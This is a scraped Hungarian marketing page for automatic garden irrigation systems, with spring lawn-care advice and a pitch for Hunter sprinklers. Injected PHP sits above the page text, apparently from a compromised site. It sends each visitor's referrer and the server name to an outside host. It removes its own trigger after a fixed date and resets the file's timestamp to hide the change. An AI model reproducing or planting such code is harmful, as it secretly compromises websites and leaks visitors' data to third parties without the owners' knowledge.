check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Öntözz Okosan!

Élet a kertben 

Az öntözőrendszer, egyedi igényekre szabott műalkotás. Életre kelti a kertet és keretbe foglalja az életet. Itt indul a nap, egy kávéval a teraszon, a párolgó gyep pedig az öntözés után a hajnali napsugarak fényében tündököl. Este pedig a kert az, ahova hazatérve megpihenhetünk egy stresszes nap után. Egy öntözős mester valódi művész, akár a karmester, pontos ütemre vezényli a földből kiemelkedő szórófejeket. Az öntözés telepítése során mérnöki precizitással kell megtervezni a kert sajátosságainak megfelelő öntözőt. A talaj, növényzet, víznyomás és számos más adottság figyelembevételével kell kialakítani egy automata öntözőrendszert, hogy az eredmény megbízható, óramű pontossággal működő egység legyen és a kert mindig szép maradjon.

 

Tavaszi pázsitápolási teendők

 

ontozzokosan gyepszelloztetogepTavasszal számos teendő adódik a gyepen, hogy igazán szép pázsitot lássunk kertünkben, feltétlenül végezzük el az alábbi munkákat: Talajlazítás, gyepszellőztetés, melynek segítségével a téli hónapokban felgyülemlett, elhalt, száraz fűből álló filcréteget, mohát és egyéb növényi maradványokat távolítunk el. A talajlazítással meglazítjuk a földet és kiszedjük az elhalt nővényi maradványokat, ezáltal elősegítjük a talaj, víz és levegő háztartását. Ha végeztünk a gyepszellőztetéssel juttassunk ki speciális gyeptrágyát, mely nitrogénben túlsúlyos és lassú lebomlású legyen. Az egyéb tápanyagok, kálium, foszfor, magnézium, stb., elősegítik a megfelelő gyökérfejlődést, mélyzöld és erős gyepet hoznak létre. Érdemes felülvetni a gyepfelületet jó minőségű fűmaggal, ezzel is felszámolva a kopottas területeket, csak így érhetjük el a folyamatosan dús pázsitfelületet. Az öntözőrendszert a nappali felmelegedéssel együtt indítsuk be és fokozatosan növeljük a kijuttatott víz mennyiségét. A munkák végeztével figyeljük a pázsitnyírási magasságára. Tavasszal nyugodtan nyírhatjuk alacsonyabbra a gyepet.

Bővebben...
 

Dobja ki a slagot!

...válassza a Hunter öntözőrendszereket!

 

Bizonyára Ön is sokat vesződik a kertje öntözésével, különösen a nyári hónapokban. A víz, a növényzet ápolása nem olcsó mulatság, és a kert kialakítása is biztosan sok munkával és költséggel járt. Senki nem akar fölöslegesen pénzt kidobni, senki sem hagyja szívesen veszendőbe menni azokat az értékeket, amelyekért fáradságosan megdolgozott. Ha Ön sok időt, pénzt és fáradtságot szeretne megtakarítani, és egy gyönyörű kert az álma, akkor válassza az amerikai Hunter automata öntözőrendszert!

 

 
« ElsőElőző12KövetkezőUtolsó »

1. oldal / 2

Szavazás

Van már öntözőrendszered?
 
Hirdetés
Hirdetés
Hirdetés
Hirdetés
Hirdetés
HirdetésUgrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú